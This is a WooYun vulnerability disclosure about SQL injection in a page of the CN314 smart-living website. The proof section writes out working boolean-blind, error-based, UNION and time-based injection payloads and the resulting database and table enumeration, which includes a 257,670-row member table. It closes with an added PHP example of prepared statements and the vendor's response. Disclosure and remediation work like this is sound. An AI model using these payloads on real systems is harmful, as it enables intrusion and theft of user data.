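Vulnerability Summary
Bug ID: wooyun-2016-0167908
Title: Full data compromise of the CN314 (中国派) smart-living site: 250,000 users plus data from multiple sub-sites
Vendor: Beijing Linge Zongheng Network Technology Co., Ltd. (北京林格纵横网络科技有限公司)
Author: 路人甲
Submitted: 2016-01-08 16:02
Fixed: 2016-02-22 16:48
Published: 2016-02-22 16:48
Vulnerability type: SQL injection
Severity: High
Self-assessed Rank: 15
Status: Handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling
Source: http://www.wooyun.org; for questions or help, contact [email protected]
Tags: none
Vulnerability Details
Disclosure status:
2016-01-08: Details sent to the vendor; awaiting vendor handling
2016-01-12: Vendor has confirmed; details visible to the vendor only
2016-01-22: Details disclosed to core white hats and experts in related fields
2016-02-01: Details disclosed to regular white hats
2016-02-11: Details disclosed to trainee white hats
2016-02-22: Details disclosed to the public
Brief description:
RT (as the title says)
Detailed description: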
http://**.**.**.**/skin/pai/extend/tushangshangxiapian.php?shangxia=shang&classid=486&id=116172 (GET)
Proof of vulnerability:
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: shangxia=shang&classid=486&id=116172 AND 7393=7393
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: shangxia=shang&classid=486&id=116172 AND (SELECT 1368 FROM(SELECT COUNT(*),CONCAT(0x7171776871,(SELECT (CASE WHEN (1368=1368) THEN 1 ELSE 0 END)),0x716c767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 7 columns
Payload: shangxia=shang&classid=486&id=-4500 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171776871,0x76425756787052676868,0x716c767871)#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: shangxia=shang&classid=486&id=116172 AND SLEEP(5)
---
web application technology: Apache 2.2.22, PHP 5.2.17
back-end DBMS: MySQL 5.0
available databases [13]:
[*] chinapader
[*] chinapaderuc
[*] chinapaderwww
[*] cn314bbs
[*] cn314bbs_bak
[*] cn314beifen1
[*] cn314beifen2
[*] cn314www
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[*] www_new
web application technology: Apache 2.2.22, PHP 5.2.17
back-end DBMS: MySQL 5.0
Database: chinapaderuc
+---------------------+---------+
| Table | Entries |
+---------------------+---------+
| uc_members | 257670 |
| uc_memberfields | 257669 |
| uc_pm_indexes | 7272 |
| uc_notelist | 5351 |
| uc_pm_members | 5251 |
| uc_pm_lists | 2811 |
| uc_tags | 944 |
| uc_pm_messages_6 | 840 |
| uc_pm_messages_5 | 783 |
| uc_pm_messages_9 | 780 |
| uc_pm_messages_1 | 776 |
| uc_pm_messages_4 | 730 |
| uc_pm_messages_3 | 721 |
| uc_pm_messages_2 | 692 |
| uc_pm_messages_0 | 683 |
| uc_pm_messages_7 | 652 |
| uc_pm_messages_8 | 613 |
| uc_newpm | 552 |
| uc_pms | 472 |
| uc_friends | 142 |
| uc_settings | 28 |
| uc_applications | 2 |
| uc_protectedmembers | 2 |
| uc_failedlogins | 1 |
+---------------------+---------+
Database: chinapaderuc
Table: uc_members
[10 entries]
Suggested fix:
Filter the parameters
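One way to implement the parameter filtering suggested above, as an added example that is not code from the affected site: the three GET parameters are allow-listed and the query uses bound parameters. The `articles` table, its columns, the meaning of `shangxia` (previous/next) and the in-memory SQLite database are assumptions made so the script runs offline.

```php
<?php
// Added example, not code from the affected site. The table `articles`, its
// columns and the in-memory SQLite database are assumptions so the script runs
// offline; the same PDO calls work against MySQL.

function parse_params(array $get)
{
    // `shangxia` is treated as a two-value switch (assumed: shang = previous, xia = next).
    $dir = isset($get['shangxia']) ? $get['shangxia'] : '';
    if ($dir !== 'shang' && $dir !== 'xia') {
        return null;
    }
    $ids = array();
    foreach (array('classid', 'id') as $name) {
        // Accept 1-9 ASCII digits only; anything else is rejected, not "cleaned".
        if (!isset($get[$name]) || !is_string($get[$name])
            || !ctype_digit($get[$name]) || strlen($get[$name]) > 9) {
            return null;
        }
        $ids[$name] = (int) $get[$name];
    }
    return array($dir, $ids['classid'], $ids['id']);
}

function neighbour_article(PDO $pdo, $dir, $classid, $id)
{
    // Operator and sort order come from a fixed map, never from the request.
    $ops = array('shang' => array('<', 'DESC'), 'xia' => array('>', 'ASC'));
    list($op, $order) = $ops[$dir];
    $stmt = $pdo->prepare("SELECT id, title FROM articles
        WHERE classid = :classid AND id $op :id ORDER BY id $order LIMIT 1");
    $stmt->bindValue(':classid', $classid, PDO::PARAM_INT);
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetch(PDO::FETCH_ASSOC);
}

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE articles (id INTEGER PRIMARY KEY, classid INTEGER, title TEXT)");
$pdo->exec("INSERT INTO articles VALUES (116171, 486, 'prev'), (116172, 486, 'cur')");

// Constructed requests: one legitimate id, then two `id` values from the report.
foreach (array('116172', '116172 AND 7393=7393', '116172 AND SLEEP(5)') as $id) {
    $p = parse_params(array('shangxia' => 'shang', 'classid' => '486', 'id' => $id));
    if ($p === null) {
        echo "400 rejected: $id\n";
        continue;
    }
    $row = neighbour_article($pdo, $p[0], $p[1], $p[2]);
    echo "200 id=$id -> article {$row['id']}\n";
}
```

In production, database errors should be logged rather than shown to the client, since the error-based technique in the proof above depends on error text reaching the response.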
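Copyright notice: when reposting, please credit the source 路人甲@乌云 (WooYun)
Vulnerability Response
Vendor response:
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2016-01-12 15:53
Vendor reply:
CNVD did not directly reproduce the reported condition and has not yet established a direct handling channel with the organization that manages the site; awaiting claim.
Latest status:
None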